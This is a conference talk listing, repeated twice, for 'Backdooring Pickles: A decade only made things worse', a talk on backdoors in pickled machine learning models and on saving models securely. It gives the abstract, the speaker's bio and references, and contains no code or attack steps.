Tweet
ColdwaterQ - Backdooring Pickles: A decade only made things worse
ColdwaterQ, Senior Security Engineer at Nvidia, He/Him
Presentation Title: Backdooring Pickles: A decade only made things worse
Length of presentation: 20 minutes
Demo, Tool
ABSTRACT
Eleven years ago, "Sour Pickles" was presented by Marco Slaviero. Python docs already said pickles were insecure at that time. But since then, machine learning frameworks started saving models in pickled formats as well. So, I will show how simple it is to add a backdoor into any pickled object using machine learning models as an example. As well as an example of how to securely save a model to prevent malicious code from being injected into it.
SPEAKER BIO(S)
ColdwaterQ has always been interested in understanding how things work. This led to a career in the security industry and allowed him to be a part of NVIDIA’s AI Red Team where he works currently. He has attended every DEF CON starting in 2012, even if the last two were only remotely, and has returned this year hoping to help give some of what he learned back to the community.
https://coldwaterq.com
@ColdwaterQ
REFERENCES:
BlackHat 2011 - "Sour Pickles, A serialised exploitation guide in one part" by Marco Slaviero
https://github.com/trailofbits/fickling
https://docs.python.org/3/library/pickletools.html
https://github.com/python/cpython/bl...pickletools.py
https://github.com/alkaet/LobotoMl/t..._runtime_hacks
[]
ColdwaterQ, Senior Security Engineer at Nvidia, He/Him
Presentation Title: Backdooring Pickles: A decade only made things worse
Length of presentation: 20 minutes
Demo, Tool
ABSTRACT
Eleven years ago, "Sour Pickles" was presented by Marco Slaviero. Python docs already said pickles were insecure at that time. But since then, machine learning frameworks started saving models in pickled formats as well. So, I will show how simple it is to add a backdoor into any pickled object using machine learning models as an example. As well as an example of how to securely save a model to prevent malicious code from being injected into it.
SPEAKER BIO(S)
ColdwaterQ has always been interested in understanding how things work. This led to a career in the security industry and allowed him to be a part of NVIDIA’s AI Red Team where he works currently. He has attended every DEF CON starting in 2012, even if the last two were only remotely, and has returned this year hoping to help give some of what he learned back to the community.
https://coldwaterq.com
@ColdwaterQ
REFERENCES:
BlackHat 2011 - "Sour Pickles, A serialised exploitation guide in one part" by Marco Slaviero
https://github.com/trailofbits/fickling
https://docs.python.org/3/library/pickletools.html
https://github.com/python/cpython/bl...pickletools.py
https://github.com/alkaet/LobotoMl/t..._runtime_hacks
[]